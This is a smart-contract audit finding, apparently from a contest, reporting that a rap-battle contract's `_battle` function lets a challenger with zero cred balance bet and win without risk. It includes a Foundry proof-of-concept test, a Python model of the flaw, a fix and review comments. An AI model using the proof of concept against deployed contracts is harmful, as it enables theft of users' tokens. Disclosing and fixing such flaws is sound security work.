Severity: high
Valid

H-4: Missing cred token balance check for challenger in _battle function, allowing challengers to participate with zero cred balance.

Summary

The internal function `_battle` has no check that the challenger holds enough cred to cover the bet in a rap battle. A challenger can therefore participate in a rap battle with zero cred tokens and potentially win the defender's bet.

Vulnerability Details

A challenger can participate in a rap battle without owning any cred tokens. If he wins, he takes the money. If he loses, the transaction reverts due to insufficient balance.

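POC

```solidity
function testChallengerCanRapBattleWithoutCred() public {
    // The defender (user) mints rapper 0 and stakes it.
    vm.startPrank(user);
    oneShot.mintRapper();
    oneShot.approve(address(streets), 0);
    streets.stake(0);
    vm.stopPrank();

    vm.warp(4 days + 1);

    // Unstake after four days so the defender holds cred to bet with.
    vm.startPrank(user);
    streets.unstake(0);
    vm.stopPrank();

    // The challenger mints rapper 1 but never stakes, so holds no cred.
    vm.startPrank(challenger);
    oneShot.mintRapper();
    vm.stopPrank();

    // The defender goes on stage with a bet of 3 cred.
    vm.startPrank(user);
    oneShot.approve(address(rapBattle), 0);
    cred.approve(address(rapBattle), 3);
    rapBattle.goOnStageOrBattle(0, 3);
    vm.stopPrank();

    // Balances before the battle.
    console.log(cred.balanceOf(challenger));
    console.log(cred.balanceOf(user));

    // The challenger enters the battle with a matching bet but no cred.
    vm.startPrank(challenger);
    oneShot.approve(address(rapBattle), 1);
    cred.approve(address(rapBattle), 3);
    rapBattle.goOnStageOrBattle(1, 3);
    vm.stopPrank();

    // Balances after the battle.
    console.log(cred.balanceOf(challenger));
    console.log(cred.balanceOf(user));
}
```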

Impact

The challenger will never lose money. If he wins, he wins all. If he loses, the transaction reverts.
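
The payoff asymmetry described above, as a simplified Python model added here for illustration (it is not the contest's Solidity code). It assumes the defender's bet is already held in an account called `pool` and that the challenger's bet is only pulled when the challenger loses; all names and balances are constructed.

```python
class Revert(Exception):
    """Models an EVM revert: every state change in the call is undone."""


class Cred:
    """Minimal token ledger (balances only; approvals assumed granted)."""

    def __init__(self, balances):
        self.bal = dict(balances)

    def transfer(self, src, dst, amount):
        if self.bal.get(src, 0) < amount:
            raise Revert("insufficient balance")
        self.bal[src] -= amount
        self.bal[dst] = self.bal.get(dst, 0) + amount


def battle(cred, bet, challenger_wins, check_balance):
    """Settle one battle atomically; returns 'settled' or 'reverted'.

    Assumed model: the defender's bet already sits in 'pool', and the
    challenger's bet is only pulled when the challenger loses.
    """
    snapshot = dict(cred.bal)
    try:
        # The recommended fix: refuse challengers who cannot cover the bet.
        if check_balance and cred.bal.get("challenger", 0) < bet:
            raise Revert("challenger cannot cover bet")
        if challenger_wins:
            cred.transfer("pool", "challenger", bet)
        else:
            cred.transfer("pool", "defender", bet)
            cred.transfer("challenger", "defender", bet)  # fails at zero balance
        return "settled"
    except Revert:
        cred.bal = snapshot  # roll back, as the EVM does on revert
        return "reverted"


def outcomes(check_balance):
    """Run both battle results for a challenger holding zero cred."""
    results = {}
    for challenger_wins in (True, False):
        cred = Cred({"pool": 3, "defender": 0, "challenger": 0})  # constructed
        status = battle(cred, 3, challenger_wins, check_balance)
        results[challenger_wins] = (status, cred.bal["challenger"], cred.bal["pool"])
    return results
```

`outcomes(False)` models the contract as reported and `outcomes(True)` models it with the balance check; each maps the battle result to the settlement status, the challenger's final balance and the remaining pool.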

Tools Used

Manual review

Recommendations

function _battle(uint256 _tokenId, uint256 _credBet) internal {
+ require(cred.balanceOf(msg.sender) >= _credBet);
address _defender = defender;
require(defenderBet == _credBet, "RapBattle: Bet amounts do not match");
uint256 defenderRapperSkill = getRapperSkill(defenderTokenId);
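
Review bot: the added `require(cred.balanceOf(msg.sender) >= _credBet);` at the top of `_battle` has no revert string, unlike the `require` two lines below it ("RapBattle: Bet amounts do not match"), so a failed call gives the caller no reason; add a message in the same "RapBattle: ..." style. The check also covers only the balance, while the judge's tag on this finding names the approval, so consider also requiring `cred.allowance(msg.sender, address(this)) >= _credBet`, or pulling the challenger's bet into the contract before the outcome is decided so the losing path cannot revert.
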
Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

missing check for sufficient `_credBet_` approval